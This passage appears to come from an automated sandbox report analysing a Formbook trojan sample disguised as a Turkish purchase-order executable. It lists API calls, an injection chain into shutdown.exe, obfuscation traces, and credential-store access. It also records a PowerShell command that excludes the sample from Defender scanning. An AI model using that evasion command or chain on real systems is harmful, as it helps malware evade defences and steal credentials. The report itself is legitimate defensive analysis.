            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772E30 NtWriteVirtualMemory,5_2_01772E30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772EE0 NtQueueApcThread,5_2_01772EE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772EA0 NtAdjustPrivilegesToken,5_2_01772EA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01772E80 NtReadVirtualMemory,5_2_01772E80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01773010 NtOpenDirectoryObject,5_2_01773010
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01773090 NtSetValueKey,5_2_01773090
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_017739B0 NtGetContextThread,5_2_017739B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01773D70 NtOpenThread,5_2_01773D70
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Code function: 5_2_01773D10 NtOpenProcessToken,5_2_01773D10
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B4340 NtSetContextThread,LdrInitializeThunk,13_2_039B4340
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B4650 NtSuspendThread,LdrInitializeThunk,13_2_039B4650
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2BA0 NtEnumerateValueKey,LdrInitializeThunk,13_2_039B2BA0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_039B2BF0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2BE0 NtQueryValueKey,LdrInitializeThunk,13_2_039B2BE0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2B60 NtClose,LdrInitializeThunk,13_2_039B2B60
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2AD0 NtReadFile,LdrInitializeThunk,13_2_039B2AD0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2AF0 NtWriteFile,LdrInitializeThunk,13_2_039B2AF0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2FB0 NtResumeThread,LdrInitializeThunk,13_2_039B2FB0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2FE0 NtCreateFile,LdrInitializeThunk,13_2_039B2FE0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2F30 NtCreateSection,LdrInitializeThunk,13_2_039B2F30
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2E80 NtReadVirtualMemory,LdrInitializeThunk,13_2_039B2E80
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2EE0 NtQueueApcThread,LdrInitializeThunk,13_2_039B2EE0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2DD0 NtDelayExecution,LdrInitializeThunk,13_2_039B2DD0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_039B2DF0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2D10 NtMapViewOfSection,LdrInitializeThunk,13_2_039B2D10
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2D30 NtUnmapViewOfSection,LdrInitializeThunk,13_2_039B2D30
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2CA0 NtQueryInformationToken,LdrInitializeThunk,13_2_039B2CA0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_039B2C70
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2C60 NtCreateKey,LdrInitializeThunk,13_2_039B2C60
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B35C0 NtCreateMutant,LdrInitializeThunk,13_2_039B35C0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B39B0 NtGetContextThread,LdrInitializeThunk,13_2_039B39B0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2B80 NtQueryInformationFile,13_2_039B2B80
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2AB0 NtWaitForSingleObject,13_2_039B2AB0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2F90 NtProtectVirtualMemory,13_2_039B2F90
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2FA0 NtQuerySection,13_2_039B2FA0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2F60 NtCreateProcessEx,13_2_039B2F60
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2EA0 NtAdjustPrivilegesToken,13_2_039B2EA0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2E30 NtWriteVirtualMemory,13_2_039B2E30
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2DB0 NtEnumerateKey,13_2_039B2DB0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2D00 NtSetInformationFile,13_2_039B2D00
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2CC0 NtQueryVirtualMemory,13_2_039B2CC0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2CF0 NtOpenProcess,13_2_039B2CF0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B2C00 NtQueryInformationProcess,13_2_039B2C00
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B3090 NtSetValueKey,13_2_039B3090
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B3010 NtOpenDirectoryObject,13_2_039B3010
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B3D10 NtOpenProcessToken,13_2_039B3D10
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_039B3D70 NtOpenThread,13_2_039B3D70
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_03258240 NtDeleteFile,13_2_03258240
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_032582D0 NtClose,13_2_032582D0
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_03258160 NtReadFile,13_2_03258160
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_03258000 NtCreateFile,13_2_03258000
            Source: C:\Windows\SysWOW64\shutdown.exe Code function: 13_2_03258420 NtAllocateVirtualMemory,13_2_03258420
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03943FD513_2_03943FD5
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03943FD213_2_03943FD2
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3FF0913_2_03A3FF09
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03989EB013_2_03989EB0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0399FDC013_2_0399FDC0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A37D7313_2_03A37D73
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03983D4013_2_03983D40
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A31D5A13_2_03A31D5A
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03A3FCF213_2_03A3FCF2
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_039F9C3213_2_039F9C32
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03241DE013_2_03241DE0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0325A70013_2_0325A700
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0323CFE713_2_0323CFE7
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0323CFF013_2_0323CFF0
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0323D21013_2_0323D210
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0323B29013_2_0323B290
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0324392013_2_03243920
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03C9B08813_2_03C9B088
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03C9C01C13_2_03C9C01C
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03C9BB6813_2_03C9BB68
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_03C9BC8313_2_03C9BC83
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 039FF290 appears 105 times
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 039B5130 appears 58 times
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 0396B970 appears 280 times
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 039C7E54 appears 110 times
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: String function: 039EEA12 appears 86 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 017AEA12 appears 86 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 01775130 appears 58 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 017BF290 appears 105 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 0172B970 appears 280 times
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: String function: 01787E54 appears 110 times
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1354636489.0000000007540000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1358819440.000000000D530000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1329890365.0000000002D91000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1328688417.000000000106E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSHUTDOWN.EXEj% vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.000000000182D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Binary or memory string: OriginalFilenamefTTh.exe> vs 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Rule matched in:
            Source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, P5EYD3VTbd1RAsAUnc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.cs Security API names: _0020.SetAccessControl
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.cs Security API names: _0020.AddAccessRule
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.cs Security API names: _0020.SetAccessControl
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.cs Security API names: _0020.AddAccessRule
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, P5EYD3VTbd1RAsAUnc.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@10/7@3/1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.log
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_plapwhs1.hgt.ps1
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: shutdown.exe, 0000000D.00000003.2490318394.0000000003485000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2490205187.0000000003464000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2492288234.000000000348F000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2561874080.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2561874080.0000000003485000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe ReversingLabs: Detection: 28%
            Source: unknown Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Process created: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe"
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe Process created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
            Source: C:\Windows\SysWOW64\shutdown.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
            Source: C:\Windows\SysWOW64\shutdown.exe Section loaded: wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe Section loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\shutdown.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: fTTh.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140611303.0000000000EAE000.00000002.00000001.01000000.0000000C.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000002.2563006189.0000000000EAE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2215943559.0000000003797000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2213972420.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: shutdown.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562237583.0000000001458000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 0000000D.00000003.2215943559.0000000003797000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2213972420.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: shutdown.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562237583.0000000001458000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fTTh.pdbSHA256x source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe

            Data Obfuscation

            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.cs.Net Code: yqN2SwCrWk System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.cs.Net Code: yqN2SwCrWk System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.2dbc398.1.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.2dbc398.1.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.7540000.3.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.7540000.3.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 13.2.shutdown.exe.400cd08.2.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.2.zkhJmzWnNnFLoIoaAsyqpwQZ.exe.2d8cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.0.zkhJmzWnNnFLoIoaAsyqpwQZ.exe.2d8cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: 0xB95FCE0F [Sat Jul 21 02:33:51 2068 UTC]
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD2794 push ds; iretd 0_2_02CD2797
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_02CD0448 pushad ; retf 0_2_02CD06F6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_05361CD4 push ds; retf 0_2_05361CE2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 0_2_072F98D8 push cs; retf 0_2_072F98E2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00418884 push eax; ret 5_2_0041888B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D888 push ecx; ret 5_2_0040D889
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00407894 push eax; iretd 5_2_00407898
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D202 pushad ; ret 5_2_0040D205
